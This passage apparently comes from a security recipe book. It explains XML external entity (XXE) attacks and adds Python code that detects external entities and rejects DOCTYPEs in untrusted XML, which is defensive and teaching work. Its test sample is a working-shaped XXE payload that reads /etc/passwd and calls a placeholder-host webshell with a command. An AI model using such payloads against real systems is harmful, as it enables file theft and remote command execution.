How it works...

XML gives the possibility of defining entities. An entity in XML is a name with a value associated with it. Every time an entity is used in the document, it is replaced by its value when the XML file is processed. Using this and the different wrappers available (such as file:// to load system files, or http:// to load URLs), we can abuse implementations that don't have the proper security measures in terms of input validation and XML parser configuration, and extract sensitive data or even execute commands on the server.

In this recipe, we used the file:// wrapper to make the parser load an arbitrary file from the server, and, after that, with the http:// wrapper, we called a web page that happened to be a webshell on the same server and executed system commands with it.
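The two weaknesses named above (missing input validation and a permissive parser configuration) are what a defender fixes. The following is an added example, not code from the recipe or the book: a small triage routine that flags external entity declarations in submitted XML (reporting which wrapper scheme each one points at) and a hardened parse function that refuses any document carrying a DOCTYPE, which is the simplest way to rule out entity expansion when the application never needs DTDs. The sample document and the URIs in it are constructed for the demonstration.

```python
import re
import xml.etree.ElementTree as ET

# Matches general (<!ENTITY name ...>) and parameter (<!ENTITY % name ...>) entity
# declarations that reference an external resource through a SYSTEM or PUBLIC
# identifier. The optional quoted group absorbs the public ID of a PUBLIC entity
# so that the last quoted string is always the resource URI.
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?:%\s*)?(?P<name>\S+)\s+(?P<kind>SYSTEM|PUBLIC)\s+'
    r'(?:"[^"]*"\s+)?"(?P<uri>[^"]*)"',
    re.IGNORECASE,
)
DOCTYPE_RE = re.compile(r'<!DOCTYPE', re.IGNORECASE)

# Constructed sample: the shape of an XXE payload that loads a local file via
# file:// and reaches a URL via http://. The hostname is a placeholder.
SAMPLE_XXE = """<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
  <!ENTITY shell SYSTEM "http://example.invalid/webshell.php?cmd=id">
]>
<data>&xxe;</data>"""

# Constructed sample: ordinary application data with no DTD at all.
SAMPLE_CLEAN = "<data><item>1</item></data>"


def find_external_entities(xml_text):
    """Return (name, uri, scheme) for every external entity declared in the text.

    This is a detection aid for logging/alerting: it does not parse the document,
    so it is safe to run on untrusted input before any parser sees it.
    """
    findings = []
    for m in ENTITY_RE.finditer(xml_text):
        uri = m.group("uri")
        scheme = uri.split(":", 1)[0].lower() if ":" in uri else ""
        findings.append((m.group("name"), uri, scheme))
    return findings


def parse_untrusted(xml_text):
    """Hardened parse: reject any DOCTYPE, so no entity (internal or external)
    can be declared, then hand the document to the parser."""
    if DOCTYPE_RE.search(xml_text):
        raise ValueError("DOCTYPE/DTD not allowed in untrusted XML")
    return ET.fromstring(xml_text)


def triage(xml_text):
    """Combine both checks into one result suitable for a request log entry."""
    result = {"external_entities": find_external_entities(xml_text)}
    try:
        root = parse_untrusted(xml_text)
        result["accepted"] = True
        result["root_tag"] = root.tag
    except ValueError as exc:
        result["accepted"] = False
        result["reason"] = str(exc)
    return result


if __name__ == "__main__":
    for label, doc in (("xxe", SAMPLE_XXE), ("clean", SAMPLE_CLEAN)):
        print(label, triage(doc))
```

The DOCTYPE rejection is deliberately blunt: if the application has a legitimate need for DTDs, the alternative is to keep the DTD but configure the parser so that external entities are never resolved, and the `find_external_entities` report is what you would write to the log either way so that attempts are visible to detection.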
